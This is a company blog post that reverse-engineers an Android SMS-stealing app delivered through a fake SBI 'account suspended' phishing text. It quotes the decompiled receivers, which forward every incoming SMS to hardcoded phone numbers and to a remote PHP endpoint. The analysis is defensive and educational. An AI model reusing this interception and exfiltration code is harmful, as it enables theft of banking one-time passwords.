Open in app

Sign in

Write

Sign in

SBI Account Will be Suspended Today

Dotworld Technologies
4 min readFeb 24, 2023

Finally I too got the message from scammers.

You might face financial loss or scammed if the scammer got your details.

SBI (State Bank of India) or any other legitimate financial institution will never ask you to provide personal information, such as your PAN card details or account information, through an unsolicited message or email.

To be exact this is the message we received. This is a message from scammers urging us to install the application in the link provided.

Dear Customer your SBI Account Will be Suspended Today Please Update Your Pancard now visit the link install app https://sbl-1-kyc-app[.]web[.]app/SBl-KYC[.]apk

Only last week we informed our co-workers not to click on such links. Today I received it via SMS. And I was happy. Not to install but to know what the application to when installing it.

Let’s see what the scammers are trying to do when we install the application in the link.

First the link.

Looks like the scammers are using Firebase from Google to host the application and distribute the application(apk).

We did a quick reverse engineering and found the below.

<uses-sdk android:minSdkVersion="16" android:targetSdkVersion="33"/>
<uses-feature android:name="android.hardware.telephony" android:required="false"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>

First we had a look at the manifest file. It requested read and send SMS permission.

 <receiver android:name="com.example.myapplication.SmsReceiver" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>
<receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>

Below that we found two Broadcast receiver registrations for SMS_RECEIVED. So they are listening for SMS we are receiving in our phone.

Lets dig further on each receivers.

if (obj2 != null) {
      SmsMessage smsMessage = Build.VERSION.SDK_INT >= 23 ? SmsMessage.createFromPdu(bArr, (String) obj2) : null;
      Intrinsics.checkExpressionValueIsNotNull(smsMessage, "currentMessage");
      String string = sharedPreferences.getString("phoneNumber", "+916306015875");
      sharedPreferences.getString("phoneNumber", "+917908459827");
      sharedPreferences.getString("phoneNumber", "+918108060160");
      sharedPreferences.getString("phoneNumber", "+917065860860");
      sharedPreferences.getString("phoneNumber", "+917304499902");
      sharedPreferences.getString("phoneNumber", "+919634224747");
      sharedPreferences.getString("phoneNumber", "+919004676782");
      String displayMessageBody = smsMessage.getDisplayMessageBody();
      if (smsMessage.getMessageClass() != SmsMessage.MessageClass.CLASS_0) {
          smsManager.sendTextMessage(string, null, displayMessageBody, null, null);
      } else {
          return;
      }
  }

Here is a brief explanation of what each line of code is doing:

  • The first line declares a variable called smsMessage of type SmsMessage. This variable is assigned a value based on the Android version installed on the device. If the Android version is 23 or above, the createFromPdu method is used to create a SmsMessage object from a Protocol Data Unit (PDU) byte array (bArr) and a String object (obj2). If the Android version is below 23, smsMessage is assigned a value of null.
  • The Intrinsics.checkExpressionValueIsNotNull method is used to check that smsMessage is not null. This is done to ensure that the getDisplayMessageBody method called later on the variable will not result in a NullPointerException.
  • The next few lines retrieve some phone numbers from shared preferences. The getString method is used to retrieve the values associated with the keys "phoneNumber" and some phone numbers are given as default values if the keys are not found.
  • The getDisplayMessageBody method is used to get the message body of the smsMessage object.
  • The getMessageClass method is used to determine the message class of the smsMessage object. If the message class is not SmsMessage.MessageClass.CLASS_0, the sendTextMessage method is called on smsManager to send a text message containing the message body (ie. SMS we received)(displayMessageBody) to the phone number stored in the string variable.
  • If the message class is SmsMessage.MessageClass.CLASS_0, the method returns without sending any text message.

Let’s have a look at another receiver.

public void onReceive(Context context, Intent intent) {
    try {
        Bundle extras = intent.getExtras();
        if (extras != null) {
            for (Object obj : (Object[]) extras.get("pdus")) {
                SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
                String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
                String displayMessageBody = createFromPdu.getDisplayMessageBody();
                Toast.makeText(context, "From: " + displayOriginatingAddress, 0).show();
                sendSMS(context, displayOriginatingAddress, displayMessageBody);
            }
        }
    } catch (Exception unused) {
        Log.e("Error", "Failed to read SMS!");
    }
  }

  public void sendSMS(Context context, String str, String str2) {
      Volley.newRequestQueue(context).add(new StringRequest(0, ("https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=" + str) + "&msg=" + Uri.encode(str2), new SmsReceiver$$ExternalSyntheticLambda0(), new SmsReceiver$$ExternalSyntheticLambda1()));
  }

Here is a brief explanation of what each line of code is doing:

  • The onReceive method is called when a new SMS is received. It gets the extras from the intent, which contain the SMS message data. If there are extras, it loops through each PDU and creates a SmsMessage object from the PDU. It then gets the sender's phone number and the message body, shows a toast with the sender's phone number, and sends the message to a server using the sendSMS method.
  • The sendSMS method uses the Volley library to send a HTTP GET request to a server. It encodes the message body using the Uri.encode method and appends it to the URL as a parameter named "msg". It also appends the sender's phone number to the URL as a parameter named "phone".

Based on the above findings, it seems that the scammers are intercepting the SMS and send it to their mobile number and one to their server.

Please do not click on the link or download any app from unverified sources.

This blog is only for informational purpose and to educate the people what this kind of applications do.

Stay tuned and follow us for more.😉

Written by
Naveen Sakthivel, CTO
Dotworld Technologies Private Limited
https://dotworld.in

Android
Scam
Sbi
Reverse Engineering
Scammer Exposed

--

--

Dotworld Technologies

Written by Dotworld Technologies

24 Followers

We develop your dreams and make you visualize it more closer to your heart

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams